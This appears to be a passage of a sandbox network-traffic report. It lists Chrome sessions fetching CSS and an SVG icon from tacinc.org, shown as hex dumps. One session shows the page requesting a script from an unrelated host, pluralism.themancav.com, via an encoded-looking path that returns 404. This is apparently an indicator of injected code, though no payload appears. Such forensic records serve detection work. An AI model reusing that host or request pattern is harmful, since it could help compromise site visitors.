                                                                                                                                                                                                                              Data Ascii: ansform:rotate(180deg) translate3d(0,0,0);transform:rotate(180deg) translate3d(0,0,0)}.spb_accordion .spb_accordion_section>h4 a>i{margin-right:10px}.spb_accordion .spb_accordion_section>h4 a>i[class*=ss-]{display:inline-block;line-height:100%;vertical-al
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 2c 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 20 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 2d 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 20 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69
                                                                                                                                                                                                                              Data Ascii: cordion_section,.spb_accordion_section .ui-accordion-content{background:0 0;border-top:2px solid rgba(0,0,0,.05);border-bottom:0 solid rgba(0,0,0,.05);margin-bottom:0}.spb_accordion .spb_accordion_section:last-child,.spb_accordion_section{border-bottom-wi
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 74 2e 61 6c 65 72 74 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 31 65 33 61 38 7d 2e 73 70 62 5f 62 75 74 74 6f 6e 5f 65 6c 65 6d 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 73 70 62 5f 62 75 74 74 6f 6e 5f 65 6c 65 6d 65 6e 74 20 61 2e 73 66 2d 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 61 2e 73 66 2d 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 31 34 70 78 20 32 36 70 78 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 20 32 30 70 78 20 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                                                                                                                                                                                                                              Data Ascii: t.alert-success{background-color:#51e3a8}.spb_button_element{text-align:center}.spb_button_element a.sf-button{margin-right:0}a.sf-button{display:inline-block;font-size:12px;line-height:20px;height:auto;padding:14px 26px;margin:0 10px 20px 0;font-weight:7
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 35 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 37 62 61 38 35 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 2e 73 66 2d 62 75 74 74 6f 6e 2e 70 69 6e 6b 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 65 35 30 34 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 65 35 30 34 66 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 2e 73 66 2d 62 75 74 74 6f 6e 2e 67 6f 6c 64 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 64 35 36 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 64 35 36 63 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 61 2e 73 66 2d 62 75 74 74 6f 6e 2e 74 72 61 6e 73 70 61 72 65 6e 74 2d 6c 69 67 68 74 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20
                                                                                                                                                                                                                              Data Ascii: 5;background-color:#37ba85;color:#fff}a.sf-button.pink{border-color:#fe504f;background-color:#fe504f;color:#fff}a.sf-button.gold{border-color:#ffd56c;background-color:#ffd56c;color:#222}a.sf-button.transparent-light{border:2px solid #fff;border:2px solid


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              75192.168.2.649808141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC601OUTGET /wp-content/uploads/hummingbird-assets/0b1483fafd54a25959314aaba369349f.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:53:29 GMT
                                                                                                                                                                                                                              ETag: W/"670fd369-19e1"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d4cf5c2d3b-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC891INData Raw: 31 39 65 31 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 65 63 73 2d 73 74 79 6c 65 73 2a 2a 2f 0d 0a 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 69 70 65 72 2d 69 6e 69 74 69 61 6c 69 7a 65 64 20 2e 65 63 73 2d 70 6f 73 74 73 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 65 63 73 2d 70 6f 73 74 2d 6c 6f 6f 70 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 74 69 74 6c 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 65 63 73 2d 6c 6f 6f 70 2d 70 72 65 76 69 65 77 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 33 64 33 64 33 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 20 67 72 61 79 3b 70 61 64 64 69 6e 67 3a 35 70 78 7d 2e 65 63 73 2d 6c 6f 6f 70 2d 70 72 65
                                                                                                                                                                                                                              Data Ascii: 19e1/**handles:ecs-styles**/.swiper-container.swiper-initialized .ecs-posts{overflow:visible}.ecs-post-loop .elementor-page-title{display:block}.ecs-loop-preview{height:100%;width:100%;background:#d3d3d3;border:solid 1px gray;padding:5px}.ecs-loop-pre
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 65 63 73 2d 70 6f 73 74 2d 6c 6f 6f 70 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 74 68 65 6d 65 2d 73 74 6f 72 65 66 72 6f 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 64 69 74 6f 72 2d 61 63 74 69 76 65 20 23 70 72 69 6d 61 72 79 2e 63 6f 6e 74 65 6e 74 2d 61 72 65 61 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 64 69 74 6f 72 2d 61 63 74 69 76 65 20 2e 65 63 73 2d 6c 61 7a 79 6c 6f 61 64 20 61 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 64 69 74 6f 72 2d 70 72 65 76 69 65 77 20 2e 65 63
                                                                                                                                                                                                                              Data Ascii: single{background-color:none;border-bottom:none;margin:0;padding:0}.ecs-post-loop.ast-article-post{width:100%}.theme-storefront.elementor-editor-active #primary.content-area{float:none}.elementor-editor-active .ecs-lazyload a,.elementor-editor-preview .ec
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 6c 73 6c 6f 61 64 2d 63 6f 6e 74 61 69 6e 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 62 61 6c 6c 73 6c 6f 61 64 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 7b 77 69 64 74 68 3a 31 65 6d 3b 68 65 69 67 68 74 3a 31 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 2e 62 61 6c 6c 73 6c 6f 61 64 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 7b 61 6e 69 6d 61 74 69 6f 6e 3a 62 61 6c 6c 73 6c 6f 61 64 2d 6d 6f 76 65 20 32 2e 33 73 20 69 6e 66 69 6e 69 74 65 20 63 75 62 69 63
                                                                                                                                                                                                                              Data Ascii: lsload-container{font-size:16px;padding:10px;position:relative}.ballsload-container div{width:1em;height:1em;position:absolute;background-color:#000;top:0;border-radius:50%}.ballsload-container div:nth-child(1){animation:ballsload-move 2.3s infinite cubic
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 69 6d 61 74 69 6f 6e 3a 62 61 6c 6c 73 6c 6f 61 64 2d 6d 6f 76 65 20 32 2e 33 73 20 33 34 35 6d 73 20 69 6e 66 69 6e 69 74 65 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 2c 2e 36 34 2c 2e 38 31 2c 2e 32 33 29 7d 2e 62 61 6c 6c 73 6c 6f 61 64 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 3a 62 61 6c 6c 73 6c 6f 61 64 2d 6d 6f 76 65 20 32 2e 33 73 20 2e 35 31 37 73 20 69 6e 66 69 6e 69 74 65 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 2c 2e 36 34 2c 2e 38 31 2c 2e 32 33 29 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 3a 62 61 6c 6c 73 6c 6f 61 64 2d 6d 6f 76 65 20 32 2e 33 73 20 2e 35 31 37 73 20 69 6e 66 69 6e 69 74 65 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 2c 2e 36 34 2c 2e 38 31
                                                                                                                                                                                                                              Data Ascii: imation:ballsload-move 2.3s 345ms infinite cubic-bezier(.2,.64,.81,.23)}.ballsload-container div:nth-child(4){animation:ballsload-move 2.3s .517s infinite cubic-bezier(.2,.64,.81,.23);-o-animation:ballsload-move 2.3s .517s infinite cubic-bezier(.2,.64,.81
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 6f 76 69 6e 67 42 61 6c 6c 47 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 69 6e 66 69 6e 69 74 65 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 69 6e 66 69 6e 69 74 65 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 69
                                                                                                                                                                                                                              Data Ascii: ovingBallG;animation-duration:1.5s;-o-animation-duration:1.5s;-ms-animation-duration:1.5s;-webkit-animation-duration:1.5s;-moz-animation-duration:1.5s;animation-iteration-count:infinite;-o-animation-iteration-count:infinite;-ms-animation-iteration-count:i
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC266INData Raw: 6d 61 74 69 6f 6e 3a 6c 64 73 2d 65 6c 6c 69 70 73 69 73 33 20 2e 36 73 20 69 6e 66 69 6e 69 74 65 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 65 6c 6c 69 70 73 69 73 31 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 65 6c 6c 69 70 73 69 73 33 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 65 6c 6c 69 70 73 69 73 32 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                                                              Data Ascii: mation:lds-ellipsis3 .6s infinite}@keyframes lds-ellipsis1{0%{transform:scale(0)}100%{transform:scale(1)}}@keyframes lds-ellipsis3{0%{transform:scale(1)}100%{transform:scale(0)}}@keyframes lds-ellipsis2{0%{transform:translate(0,0)}100%{transform:translate
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              76192.168.2.649810141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC388OUTGET /wp-content/themes/tac-child/images/search-icon.svg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC482INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:19 GMT
                                                                                                                                                                                                                              ETag: W/"66f56b87-938"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d509163594-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC887INData Raw: 39 33 38 0d 0a 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 34 20 31 34 22 20 77 69 64 74 68 3d 22 31 34 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 31 31 2e 38 31 37 33 32 39 33 20 31 30 2e 39 37 33 30 33 35 37 2d 32 2e 36 39 37 38 39 32 31 39 2d 32 2e 37 30 31 30 35 34 33 63 2e 33 32 37 38 37 31 33 32 2d 2e 34 31 32 36 36 33 32 35 2e 35 39 30 31 36 32 37 34 2d 2e 38 39 35 36 36 30 34 31 2e 37 38 36 38 38 35 32 32 2d 31 2e 34 34 39 30 30 34 2e 31 39 36 37 32 32 34 37 2d 2e 35 35 33 33 34 33 35 38 2e 32 39 35 30 38 32 31 37 2d 31 2e 31 33 30 31 32 36 30 36 2e 32 39 35 30 38 32 31 37 2d 31 2e 37 33 30 33 36 33 30
                                                                                                                                                                                                                              Data Ascii: 938<svg height="14" viewBox="0 0 14 14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m11.8173293 10.9730357-2.69789219-2.7010543c.32787132-.41266325.59016274-.89566041.78688522-1.449004.19672247-.55334358.29508217-1.13012606.29508217-1.7303630
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 38 2e 32 36 32 36 30 33 36 33 20 31 2e 32 37 38 36 38 35 31 37 2e 33 39 33 39 30 33 30 33 20 31 2e 39 38 31 32 36 34 37 38 2e 33 39 33 39 30 33 30 33 2e 35 39 39 35 33 34 32 31 20 30 20 31 2e 31 36 36 32 37 34 35 36 2d 2e 30 39 38 34 37 35 20 31 2e 37 30 30 32 33 35 31 33 2d 2e 32 39 35 34 32 38 30 35 2e 35 33 33 39 35 39 2d 2e 31 39 36 39 35 33 31 20 31 2e 30 32 35 37 35 37 33 38 2d 2e 34 35 39 35 35 32 20 31 2e 34 37 35 34 30 39 32 31 2d 2e 37 38 37 38 30 37 36 38 6c 32 2e 36 39 37 38 39 32 32 32 20 32 2e 37 30 31 30 35 35 30 33 63 2e 30 36 35 35 37 33 36 2e 30 36 35 36 35 31 2e 31 33 38 31 37 32 37 2e 31 31 32 35 34 33 39 2e 32 31 37 37 39 38 39 2e 31 34 30 36 38 2e 30 37 39 36 32 34 35 2e 30 32 38 31 33 36 31 2e 31 34 37 35 33 39 35 2e 30 34 32 32 30
                                                                                                                                                                                                                              Data Ascii: 8.26260363 1.27868517.39390303 1.98126478.39390303.59953421 0 1.16627456-.098475 1.70023513-.29542805.533959-.1969531 1.02575738-.459552 1.47540921-.78780768l2.69789222 2.70105503c.0655736.065651.1381727.1125439.2177989.14068.0796245.0281361.1475395.04220
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC111INData Raw: 32 2d 2e 32 39 35 30 38 32 2d 31 2e 35 31 39 33 34 32 35 39 7a 22 20 66 69 6c 6c 3d 22 23 32 32 61 39 64 30 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 73 74 72 6f 6b 65 3d 22 23 32 32 61 39 64 30 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 20 31 29 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: 2-.295082-1.51934259z" fill="#22a9d0" fill-rule="evenodd" stroke="#22a9d0" transform="translate(1 1)"/></svg>
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              77192.168.2.649801207.148.0.164431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC573OUTGET /0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ== HTTP/1.1
                                                                                                                                                                                                                              Host: pluralism.themancav.com
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              78192.168.2.649812141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC572OUTGET /wp-content/uploads/elementor/css/post-815.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 17:08:47 GMT
                                                                                                                                                                                                                              ETag: W/"670ea19f-2a4"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d5cbdd4654-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
